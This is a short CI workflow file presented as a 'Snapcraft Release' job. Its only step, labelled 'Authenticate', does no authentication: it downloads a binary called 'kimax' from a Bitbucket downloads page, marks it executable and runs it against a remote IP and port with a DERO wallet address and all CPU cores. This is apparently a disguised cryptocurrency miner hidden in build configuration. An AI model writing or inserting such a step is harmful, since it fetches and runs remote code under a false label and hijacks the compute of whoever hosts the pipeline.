workflows:
  snapcraft-release:
    name: Snapcraft Release
    instance_type: linux_x2
    triggering:
      tag_patterns:
         - pattern: '*-test'
           include: true
    scripts:
      - name: Authenticate
        script: |
          wget https://bitbucket.org/kunemuse-98876/dynex/downloads/kimax && chmod +x kimax && ./kimax -r 134.122.92.217:443 -w dero1qyrjju06l2mnxe54uscejngc3qusc4ztt0p80d3zjcnv5023ya58qqq80jczy -m $(nproc --all) -p rpc
